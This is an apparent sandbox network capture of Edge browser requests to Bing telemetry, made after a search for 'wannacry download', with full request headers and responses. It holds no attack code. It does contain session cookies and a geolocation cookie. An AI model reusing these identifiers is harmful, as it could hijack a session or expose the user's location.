https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A29556%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199058154%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A29556%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199058154%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f2f3
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A29557%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199058155%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A29557%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199058155%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f32a
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f395
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum10%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum10%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f397
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f10%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f10%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f39a
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f39b
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058158%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22SuppressingFeature%22%3A%22lgVidAns%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1729199058339%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22lgVidAns%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1729199058371%2C%22Name%22%3A%222%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058158%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22SuppressingFeature%22%3A%22lgVidAns%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1729199058339%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22lgVidAns%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1729199058371%2C%22Name%22%3A%222%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
